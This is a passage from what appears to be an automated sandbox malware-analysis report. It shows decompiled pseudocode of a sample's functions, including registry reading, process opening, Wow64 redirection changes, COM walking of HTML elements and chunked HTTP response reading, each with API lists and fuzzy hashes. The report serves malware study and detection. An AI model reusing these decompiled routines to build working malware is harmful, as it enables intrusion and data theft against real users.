                        					_v52 = _t23;
                        					_v48 = _t29;
                        					_v44 = _t30;
                        					 *_t32(0);
                        					_push( &_v64);
                        					if( *0x477a100() != 0) {
                        						_a4 = _a4 & 0x00000000;
                        					} else {
                        						_a4 = GetLastError();
                        					}
                        					 *_t32(1);
                        				}
                        				return _a4;
                        			}

                        APIs
                          • Part of subcall function 04772BF3: SysAllocString.OLEAUT32(?), ref: 04772C4F
                          • Part of subcall function 04772BF3: SysAllocString.OLEAUT32(0070006F), ref: 04772C63
                          • Part of subcall function 04772BF3: SysAllocString.OLEAUT32(00000000), ref: 04772C75
                          • Part of subcall function 04772BF3: SysFreeString.OLEAUT32(00000000), ref: 04772CD9
                        • memset.NTDLL ref: 047763F1
                        • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 0477642D
                        • GetLastError.KERNEL32 ref: 0477643D
                        • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 0477644E
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                        • String ID: <
                        • API String ID: 593937197-4251816714
                        • Opcode ID: 09cb6f5ab7205489a057bc876cffa615fbbc61a91d81f04ce21a535c0c48c43f
                        • Instruction ID: f67ae210e6a5691345a799f1582420457d455d9656449998a4bde644c6283d12
                        • Opcode Fuzzy Hash: 09cb6f5ab7205489a057bc876cffa615fbbc61a91d81f04ce21a535c0c48c43f
                        • Instruction Fuzzy Hash: E71100B1940218ABEB10DFA5D889BDD7BF8FB08794F948426E905E7241E774A604CF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • _malloc.LIBCMT ref: 6C550898
                          • Part of subcall function 6C547276: __FF_MSGBANNER.LIBCMT ref: 6C54728D
                          • Part of subcall function 6C547276: __NMSG_WRITE.LIBCMT ref: 6C547294
                          • Part of subcall function 6C547276: RtlAllocateHeap.NTDLL(6D56935C,00000000,00000001), ref: 6C5472B9
                        • _free.LIBCMT ref: 6C5508AB
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: AllocateHeap_free_malloc
                        • String ID:
                        • API String ID: 1020059152-0
                        • Opcode ID: 4b4cd3f7d2d704ebf9b710c087a62456599292fd4527b414f0bfde2a518df8e8
                        • Instruction ID: 769f1eab436e2ce4118b27321232a20ba578d820adf8f7ba1b35b09306f86845
                        • Opcode Fuzzy Hash: 4b4cd3f7d2d704ebf9b710c087a62456599292fd4527b414f0bfde2a518df8e8
                        • Instruction Fuzzy Hash: E411C172949395EBEF106B789C04B9A3BB59F813ACB558527F81486E50DF348864CAD0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E04772A18(intOrPtr _a4) {
                        				void* _t2;
                        				long _t4;
                        				void* _t5;
                        				long _t6;
                        				void* _t7;
                        
                        				_t2 = CreateEventA(0, 1, 0, 0);
                        				 *0x477a2c4 = _t2;
                        				if(_t2 == 0) {
                        					return GetLastError();
                        				}
                        				_t4 = GetVersion();
                        				if(_t4 <= 5) {
                        					_t5 = 0x32;
                        					return _t5;
                        				}
                        				 *0x477a2b4 = _t4;
                        				_t6 = GetCurrentProcessId();
                        				 *0x477a2b0 = _t6;
                        				 *0x477a2bc = _a4;
                        				_t7 = OpenProcess(0x10047a, 0, _t6);
                        				 *0x477a2ac = _t7;
                        				if(_t7 == 0) {
                        					 *0x477a2ac =  *0x477a2ac | 0xffffffff;
                        				}
                        				return 0;
                        			}

                        APIs
                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0477446F,?,?,00000001), ref: 04772A20
                        • GetVersion.KERNEL32(?,00000001), ref: 04772A2F
                        • GetCurrentProcessId.KERNEL32(?,00000001), ref: 04772A3E
                        • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 04772A5B
                        • GetLastError.KERNEL32(?,00000001), ref: 04772A7A
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                        • String ID:
                        • API String ID: 2270775618-0
                        • Opcode ID: f5928c85c952e0853e688c7bfd874cb33735b7fc7dc83c7a72b13228a5daebb0
                        • Instruction ID: 5d74cecff86463836594e8f9d8c55aa8ed63e7cc41e1ccde5979087a249c0751
                        • Opcode Fuzzy Hash: f5928c85c952e0853e688c7bfd874cb33735b7fc7dc83c7a72b13228a5daebb0
                        • Instruction Fuzzy Hash: 0FF049B0796302AFFB309F61AA097993BA0F748750F80C969EB16C53C0E6799800CF18
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E0477202E(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                        				signed int _v8;
                        				char _v12;
                        				signed int* _v16;
                        				char _v284;
                        				void* __esi;
                        				char* _t60;
                        				intOrPtr* _t61;
                        				intOrPtr _t65;
                        				char _t68;
                        				intOrPtr _t72;
                        				intOrPtr _t73;
                        				intOrPtr _t75;
                        				void* _t78;
                        				void* _t88;
                        				void* _t97;
                        				void* _t98;
                        				char _t104;
                        				signed int* _t106;
                        				intOrPtr* _t107;
                        				void* _t108;
                        
                        				_t98 = __ecx;
                        				_v8 = _v8 & 0x00000000;
                        				_t104 = _a16;
                        				if(_t104 == 0) {
                        					__imp__( &_v284,  *0x477a38c);
                        					_t97 = 0x80000002;
                        					L6:
                        					_t60 = E047733FA(0,  &_v284);
                        					_a8 = _t60;
                        					if(_t60 == 0) {
                        						_v8 = 8;
                        						L29:
                        						_t61 = _a20;
                        						if(_t61 != 0) {
                        							 *_t61 =  *_t61 + 1;
                        						}
                        						return _v8;
                        					}
                        					_t107 = _a24;
                        					if(E04774B4F(_t98, _t103, _t107, _t97, _t60) != 0) {
                        						L27:
                        						E04772A03(_a8);
                        						goto L29;
                        					}
                        					_t65 =  *0x477a2d0; // 0x96d5a8
                        					_t16 = _t65 + 0x477b908; // 0x65696c43
                        					_t68 = E047733FA(0, _t16);
                        					_a24 = _t68;
                        					if(_t68 == 0) {
                        						L14:
                        						_t29 = _t107 + 0x14; // 0x102
                        						_t33 = _t107 + 0x10; // 0x3d047790
                        						if(E04775C15(_t103,  *_t33, _t97, _a8,  *0x477a384,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                        							_t72 =  *0x477a2d0; // 0x96d5a8
                        							if(_t104 == 0) {
                        								_t35 = _t72 + 0x477ba0f; // 0x4d4c4b48
                        								_t73 = _t35;
                        							} else {
                        								_t34 = _t72 + 0x477b927; // 0x55434b48
                        								_t73 = _t34;
                        							}
                        							if(E0477762C(_t73,  *0x477a384,  *0x477a388,  &_a24,  &_a16) == 0) {
                        								if(_t104 == 0) {
                        									_t75 =  *0x477a2d0; // 0x96d5a8
                        									_t44 = _t75 + 0x477b893; // 0x74666f53
                        									_t78 = E047733FA(0, _t44);
                        									_t105 = _t78;
                        									if(_t78 == 0) {
                        										_v8 = 8;
                        									} else {
                        										_t47 = _t107 + 0x10; // 0x3d047790
                        										E047733B7( *_t47, _t97, _a8,  *0x477a388, _a24);
                        										_t49 = _t107 + 0x10; // 0x3d047790
                        										E047733B7( *_t49, _t97, _t105,  *0x477a380, _a16);
                        										E04772A03(_t105);
                        									}
                        								} else {
                        									_t40 = _t107 + 0x10; // 0x3d047790
                        									E047733B7( *_t40, _t97, _a8,  *0x477a388, _a24);
                        									_t43 = _t107 + 0x10; // 0x3d047790
                        									E047733B7( *_t43, _t97, _a8,  *0x477a380, _a16);
                        								}
                        								if( *_t107 != 0) {
                        									E04772A03(_a24);
                        								} else {
                        									 *_t107 = _a16;
                        								}
                        							}
                        						}
                        						goto L27;
                        					}
                        					_t21 = _t107 + 0x10; // 0x3d047790
                        					if(E04775419( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
                        						_t106 = _v16;
                        						_t88 = 0x28;
                        						if(_v12 == _t88) {
                        							 *_t106 =  *_t106 & 0x00000000;
                        							_t26 = _t107 + 0x10; // 0x3d047790
                        							E04775C15(_t103,  *_t26, _t97, _a8, _a24, _t106);
                        						}
                        						E04772A03(_t106);
                        						_t104 = _a16;
                        					}
                        					E04772A03(_a24);
                        					goto L14;
                        				}
                        				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                        					goto L29;
                        				} else {
                        					_t103 = _a8;
                        					E04777973(_t104, _a8,  &_v284);
                        					__imp__(_t108 + _t104 - 0x117,  *0x477a38c);
                        					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
                        					_t97 = 0x80000003;
                        					goto L6;
                        				}
                        			}

                        APIs
                        • StrChrA.SHLWAPI(04777319,0000005F,00000000,00000000,00000104), ref: 04772061
                        • lstrcpy.KERNEL32(?,?), ref: 0477208E
                          • Part of subcall function 047733FA: lstrlen.KERNEL32(?,0477A380,73BB7FC0,00000000,04772788,?,?,?,?,?,04773EAC,?), ref: 04773403
                          • Part of subcall function 047733FA: mbstowcs.NTDLL ref: 0477342A
                          • Part of subcall function 047733FA: memset.NTDLL ref: 0477343C
                          • Part of subcall function 047733B7: lstrlenW.KERNEL32(04777319,?,?,04772202,3D047790,80000002,04777319,0477742D,74666F53,4D4C4B48,0477742D,?,3D047790,80000002,04777319,?), ref: 047733D7
                          • Part of subcall function 04772A03: RtlFreeHeap.NTDLL(00000000,00000000,04774072,00000000,?,?,00000000,?,?,?,?,?,?,047744AE,00000000), ref: 04772A0F
                        • lstrcpy.KERNEL32(?,00000000), ref: 047720B0
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                        • String ID: \
                        • API String ID: 3924217599-2967466578
                        • Opcode ID: 628d072f959bff7cc67fad9c54041b295b193be4cf7c29d1448b245d58be7cc2
                        • Instruction ID: 7910ad58c598784b34823dae304125d095c8dda4e9f3821951b6de688123393a
                        • Opcode Fuzzy Hash: 628d072f959bff7cc67fad9c54041b295b193be4cf7c29d1448b245d58be7cc2
                        • Instruction Fuzzy Hash: 65514F7250020AEFEF219FA4DD44E9A37B9FF04344F918864FA2596222E735FD15DB10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: _wcscmp
                        • String ID: ACP$OCP
                        • API String ID: 856254489-711371036
                        • Opcode ID: f7335fd3aa7969d6611c221d24ea7760a8b49a2134abef43f3f83c60178e6252
                        • Instruction ID: e32e385c8bb73fe654b9a52975f30fe24852345029cc45bad2e47c01f4767da8
                        • Opcode Fuzzy Hash: f7335fd3aa7969d6611c221d24ea7760a8b49a2134abef43f3f83c60178e6252
                        • Instruction Fuzzy Hash: 9801C032215345BEFB009A59DC85FDA33EC9F0076CF808427F904EAB81FB30DAA48294
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E047713B4(intOrPtr* __eax) {
                        				void* _v8;
                        				WCHAR* _v12;
                        				void* _v16;
                        				char _v20;
                        				void* _v24;
                        				intOrPtr _v28;
                        				void* _v32;
                        				intOrPtr _v40;
                        				short _v48;
                        				intOrPtr _v56;
                        				short _v64;
                        				intOrPtr* _t54;
                        				intOrPtr* _t56;
                        				intOrPtr _t57;
                        				intOrPtr* _t58;
                        				intOrPtr* _t60;
                        				void* _t61;
                        				intOrPtr* _t63;
                        				intOrPtr* _t65;
                        				intOrPtr* _t67;
                        				intOrPtr* _t69;
                        				intOrPtr* _t71;
                        				intOrPtr* _t74;
                        				intOrPtr* _t76;
                        				intOrPtr _t78;
                        				intOrPtr* _t82;
                        				intOrPtr* _t86;
                        				intOrPtr _t102;
                        				intOrPtr _t108;
                        				void* _t117;
                        				void* _t121;
                        				void* _t122;
                        				intOrPtr _t129;
                        
                        				_t122 = _t121 - 0x3c;
                        				_push( &_v8);
                        				_push(__eax);
                        				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                        				if(_t117 >= 0) {
                        					_t54 = _v8;
                        					_t102 =  *0x477a2d0; // 0x96d5a8
                        					_t5 = _t102 + 0x477b038; // 0x3050f485
                        					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                        					_t56 = _v8;
                        					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                        					if(_t117 >= 0) {
                        						__imp__#2(0x47792d0);
                        						_v28 = _t57;
                        						if(_t57 == 0) {
                        							_t117 = 0x8007000e;
                        						} else {
                        							_t60 = _v32;
                        							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                        							_t86 = __imp__#6;
                        							_t117 = _t61;
                        							if(_t117 >= 0) {
                        								_t63 = _v24;
                        								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                        								if(_t117 >= 0) {
                        									_t129 = _v20;
                        									if(_t129 != 0) {
                        										_v64 = 3;
                        										_v48 = 3;
                        										_v56 = 0;
                        										_v40 = 0;
                        										if(_t129 > 0) {
                        											while(1) {
                        												_t67 = _v24;
                        												asm("movsd");
                        												asm("movsd");
                        												asm("movsd");
                        												asm("movsd");
                        												_t122 = _t122;
                        												asm("movsd");
                        												asm("movsd");
                        												asm("movsd");
                        												asm("movsd");
                        												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                        												if(_t117 < 0) {
                        													goto L16;
                        												}
                        												_t69 = _v8;
                        												_t108 =  *0x477a2d0; // 0x96d5a8
                        												_t28 = _t108 + 0x477b0bc; // 0x3050f1ff
                        												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                        												if(_t117 >= 0) {
                        													_t74 = _v16;
                        													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                        													if(_t117 >= 0 && _v12 != 0) {
                        														_t78 =  *0x477a2d0; // 0x96d5a8
                        														_t33 = _t78 + 0x477b078; // 0x76006f
                        														if(lstrcmpW(_v12, _t33) == 0) {
                        															_t82 = _v16;
                        															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                        														}
                        														 *_t86(_v12);
                        													}
                        													_t76 = _v16;
                        													 *((intOrPtr*)( *_t76 + 8))(_t76);
                        												}
                        												_t71 = _v8;
                        												 *((intOrPtr*)( *_t71 + 8))(_t71);
                        												_v40 = _v40 + 1;
                        												if(_v40 < _v20) {
                        													continue;
                        												}
                        												goto L16;
                        											}
                        										}
                        									}
                        								}
                        								L16:
                        								_t65 = _v24;
                        								 *((intOrPtr*)( *_t65 + 8))(_t65);
                        							}
                        							 *_t86(_v28);
                        						}
                        						_t58 = _v32;
                        						 *((intOrPtr*)( *_t58 + 8))(_t58);
                        					}
                        				}
                        				return _t117;
                        			}

                        APIs
                        • SysAllocString.OLEAUT32(047792D0), ref: 04771404
                        • lstrcmpW.KERNEL32(00000000,0076006F), ref: 047714E6
                        • SysFreeString.OLEAUT32(00000000), ref: 047714FF
                        • SysFreeString.OLEAUT32(?), ref: 0477152E
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: String$Free$Alloclstrcmp
                        • String ID:
                        • API String ID: 1885612795-0
                        • Opcode ID: b2215b92ef4a2245a9496095a0d0f57545d45d6e308ccb6f90ec741315c2c25e
                        • Instruction ID: 74a6dddabcd0098a8bc9fbc82ff8a50b501052021578051173a4ec02528e3a44
                        • Opcode Fuzzy Hash: b2215b92ef4a2245a9496095a0d0f57545d45d6e308ccb6f90ec741315c2c25e
                        • Instruction Fuzzy Hash: A8511DB6D00509DFCF04DFA8C4888AEB7B9FF89704B548594E916EB310D735AD01CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • __Getcvt.LIBCPMT ref: 6C542371
                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000002,?,00000000,00000000,00000001,?), ref: 6C5423BF
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,00000000,00000001,?), ref: 6C542435
                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,00000000,00000001,?), ref: 6C54245D
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: ByteCharMultiWide$Getcvt
                        • String ID:
                        • API String ID: 3195005509-0
                        • Opcode ID: ccfb7a2dbcabca4432941706282d95a7fcd6bcc8e117dfb57790cc9a4e8976ff
                        • Instruction ID: 368c42ebfee037e389d4d3dc3f377a64b62501de662ef2be758ff76a58f0bcb2
                        • Opcode Fuzzy Hash: ccfb7a2dbcabca4432941706282d95a7fcd6bcc8e117dfb57790cc9a4e8976ff
                        • Instruction Fuzzy Hash: 8641D13160436AEFDB158F65CC48B6E7BBAAF42315F15C529F854DBA80D770E884CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                        • String ID:
                        • API String ID: 2782032738-0
                        • Opcode ID: f01a4516b64690ff8ae3e7e02d86db52a69eca7b0c6003d6e55d65bf10e5dcfe
                        • Instruction ID: 076f22894ae71d492647b2c662552c02d69159ee23f0aeea712e0f25032e28c5
                        • Opcode Fuzzy Hash: f01a4516b64690ff8ae3e7e02d86db52a69eca7b0c6003d6e55d65bf10e5dcfe
                        • Instruction Fuzzy Hash: E141C631B056059BDB18CF69CC905AE77A6EF913A8B21CA3DE815C7A40E770DD85CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E04771E91(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				signed int _v16;
                        				void _v156;
                        				void _v428;
                        				void* _t55;
                        				unsigned int _t56;
                        				signed int _t66;
                        				signed int _t74;
                        				void* _t76;
                        				signed int _t79;
                        				void* _t81;
                        				void* _t92;
                        				void* _t96;
                        				signed int* _t99;
                        				signed int _t101;
                        				signed int _t103;
                        				void* _t107;
                        
                        				_t92 = _a12;
                        				_t101 = __eax;
                        				_t55 = E04775278(_a16, _t92);
                        				_t79 = _t55;
                        				if(_t79 == 0) {
                        					L18:
                        					return _t55;
                        				}
                        				_t56 =  *(_t92 + _t79 * 4 - 4);
                        				_t81 = 0;
                        				_t96 = 0x20;
                        				if(_t56 == 0) {
                        					L4:
                        					_t97 = _t96 - _t81;
                        					_v12 = _t96 - _t81;
                        					E04772399(_t79,  &_v428);
                        					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04773C32(_t101,  &_v428, _a8, _t96 - _t81);
                        					E04773C32(_t79,  &_v156, _a12, _t97);
                        					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                        					_t66 = E04772399(_t101,  &E0477A188);
                        					_t103 = _t101 - _t79;
                        					_a8 = _t103;
                        					if(_t103 < 0) {
                        						L17:
                        						E04772399(_a16, _a4);
                        						E0477114C(_t79,  &_v428, _a4, _t97);
                        						memset( &_v428, 0, 0x10c);
                        						_t55 = memset( &_v156, 0, 0x84);
                        						goto L18;
                        					}
                        					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                        					do {
                        						if(_v8 != 0xffffffff) {
                        							_push(1);
                        							_push(0);
                        							_push(0);
                        							_push( *_t99);
                        							L04777F56();
                        							_t74 = _t66 +  *(_t99 - 4);
                        							asm("adc edx, esi");
                        							_push(0);
                        							_push(_v8 + 1);
                        							_push(_t92);
                        							_push(_t74);
                        							L04777F50();
                        							if(_t92 > 0 || _t74 > 0xffffffff) {
                        								_t74 = _t74 | 0xffffffff;
                        								_v16 = _v16 & 0x00000000;
                        							}
                        						} else {
                        							_t74 =  *_t99;
                        						}
                        						_t106 = _t107 + _a8 * 4 - 0x1a8;
                        						_a12 = _t74;
                        						_t76 = E04775381(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                        						while(1) {
                        							 *_t99 =  *_t99 - _t76;
                        							if( *_t99 != 0) {
                        								goto L14;
                        							}
                        							L13:
                        							_t92 =  &_v156;
                        							if(E047745B4(_t79, _t92, _t106) < 0) {
                        								break;
                        							}
                        							L14:
                        							_a12 = _a12 + 1;
                        							_t76 = E04775936(_t79,  &_v156, _t106, _t106);
                        							 *_t99 =  *_t99 - _t76;
                        							if( *_t99 != 0) {
                        								goto L14;
                        							}
                        							goto L13;
                        						}
                        						_a8 = _a8 - 1;
                        						_t66 = _a12;
                        						_t99 = _t99 - 4;
                        						 *(_a8 * 4 +  &E0477A188) = _t66;
                        					} while (_a8 >= 0);
                        					_t97 = _v12;
                        					goto L17;
                        				}
                        				while(_t81 < _t96) {
                        					_t81 = _t81 + 1;
                        					_t56 = _t56 >> 1;
                        					if(_t56 != 0) {
                        						continue;
                        					}
                        					goto L4;
                        				}
                        				goto L4;
                        			}

                        APIs
                        • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04771F44
                        • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04771F5A
                        • memset.NTDLL ref: 04772003
                        • memset.NTDLL ref: 04772019
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: memset$_allmul_aulldiv
                        • String ID:
                        • API String ID: 3041852380-0
                        • Opcode ID: 1c7eb5832ec9ccc2eca699de81a1faf41c63c2b4cd12bfc5a19d1c0e8daf3b43
                        • Instruction ID: 15e4eb657a9cbf408b0b01540e39096528e433cfd6531689cbf9a76dee6700dc
                        • Opcode Fuzzy Hash: 1c7eb5832ec9ccc2eca699de81a1faf41c63c2b4cd12bfc5a19d1c0e8daf3b43
                        • Instruction Fuzzy Hash: 0B41AD31A01219AFEF109F68CC44BEE77B9EF46314F804569F859A7381EB70BA55CB81
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 56%
                        			E0477467C(void* __eax) {
                        				long _v8;
                        				char _v12;
                        				char _v16;
                        				intOrPtr _v20;
                        				void* _v24;
                        				void* __esi;
                        				char* _t40;
                        				long _t41;
                        				intOrPtr _t45;
                        				intOrPtr* _t46;
                        				char _t48;
                        				char* _t53;
                        				long _t54;
                        				intOrPtr* _t55;
                        				void* _t64;
                        
                        				_t64 = __eax;
                        				_t40 =  &_v12;
                        				_v8 = 0;
                        				_v16 = 0;
                        				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
                        				if(_t40 == 0) {
                        					_t41 = GetLastError();
                        					_v8 = _t41;
                        					if(_t41 != 0x2efe) {
                        						L26:
                        						return _v8;
                        					}
                        					_v8 = 0;
                        					L25:
                        					 *((intOrPtr*)(_t64 + 0x30)) = 0;
                        					goto L26;
                        				}
                        				if(_v12 == 0) {
                        					goto L25;
                        				}
                        				_push( &_v24);
                        				_push(1);
                        				_push(0);
                        				if( *0x477a148() != 0) {
                        					_v8 = 8;
                        					goto L26;
                        				}
                        				_t45 = E04775C4E(0x1000);
                        				_v20 = _t45;
                        				if(_t45 == 0) {
                        					_v8 = 8;
                        					L21:
                        					_t46 = _v24;
                        					 *((intOrPtr*)( *_t46 + 8))(_t46);
                        					goto L26;
                        				} else {
                        					goto L4;
                        				}
                        				do {
                        					while(1) {
                        						L4:
                        						_t48 = _v12;
                        						if(_t48 >= 0x1000) {
                        							_t48 = 0x1000;
                        						}
                        						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
                        						if(_t48 == 0) {
                        							break;
                        						}
                        						_t55 = _v24;
                        						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
                        						_t17 =  &_v12;
                        						 *_t17 = _v12 - _v16;
                        						if( *_t17 != 0) {
                        							continue;
                        						}
                        						L10:
                        						if(WaitForSingleObject( *0x477a2c4, 0) != 0x102) {
                        							_v8 = 0x102;
                        							L18:
                        							E04772A03(_v20);
                        							if(_v8 == 0) {
                        								_v8 = E04776589(_v24, _t64);
                        							}
                        							goto L21;
                        						}
                        						_t53 =  &_v12;
                        						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
                        						if(_t53 != 0) {
                        							goto L15;
                        						}
                        						_t54 = GetLastError();
                        						_v8 = _t54;
                        						if(_t54 != 0x2f78 || _v12 != 0) {
                        							goto L18;
                        						} else {
                        							_v8 = 0;
                        							goto L15;
                        						}
                        					}
                        					_v8 = GetLastError();
                        					goto L10;
                        					L15:
                        				} while (_v12 != 0);
                        				goto L18;
                        			}



















                        APIs
                        • GetLastError.KERNEL32 ref: 0477479C
                          • Part of subcall function 04775C4E: RtlAllocateHeap.NTDLL(00000000,00000000,04773FAA), ref: 04775C5A
                        • GetLastError.KERNEL32 ref: 04774710
                        • WaitForSingleObject.KERNEL32(00000000), ref: 04774720
                        • GetLastError.KERNEL32 ref: 04774740
                        Memory Dump Source
                        • Source File: 00000003.00000002.917640583.0000000004771000.00000020.00000001.sdmp, Offset: 04770000, based on PE: true
                        • Associated: 00000003.00000002.917632662.0000000004770000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917651944.0000000004779000.00000002.00000001.sdmp
                        • Associated: 00000003.00000002.917659694.000000000477A000.00000004.00000001.sdmp
                        • Associated: 00000003.00000002.917667183.000000000477C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: ErrorLast$AllocateHeapObjectSingleWait
                        • String ID:
                        • API String ID: 35602742-0
                        • Opcode ID: b52ddd7d638e862d28d36be4d3022f3c2ad0e4abe63fafa13e34db273ca58ec2
                        • Instruction ID: e46259c3189bd6ab5ce2c56af65bbf987fe7ccb2417233297e373193d379bc86
                        • Opcode Fuzzy Hash: b52ddd7d638e862d28d36be4d3022f3c2ad0e4abe63fafa13e34db273ca58ec2
                        • Instruction Fuzzy Hash: C1410AB4A01209EFDF10DFA5C9889AEBBBDFF45345FA08469E501E6250E734AE40DB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6C55235E
                        • __isleadbyte_l.LIBCMT ref: 6C55238C
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000040,00000001,?,00000000), ref: 6C5523BA
                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000040,00000001,?,00000000), ref: 6C5523F0
                        Memory Dump Source
                        • Source File: 00000003.00000002.920114667.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: 7a72e7cddda788c7839d0ef1ed5832f63bab5cfdf505fbcfafb96bba24e32371
                        • Instruction ID: 5a80abe2180239740689a8a7b1b4d1af9a2c6f97a7984e8a00b659925f0fcf83
                        • Opcode Fuzzy Hash: 7a72e7cddda788c7839d0ef1ed5832f63bab5cfdf505fbcfafb96bba24e32371
                        • Instruction Fuzzy Hash: 7731F230601246EFDB15CF25CC48BAE7BB5FF41314F56452AE8249B9A0E730D8A1DB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
                        			E04774CD5(signed int _a4, signed int* _a8) {
                        				void* __ecx;
                        				void* __edi;
                        				signed int _t6;
                        				intOrPtr _t8;
                        				intOrPtr _t12;
                        				void* _t25;
                        				void* _t26;
                        				signed int* _t27;
                        				signed short* _t28;
                        				CHAR* _t30;
                        				long _t31;
                        				intOrPtr* _t32;
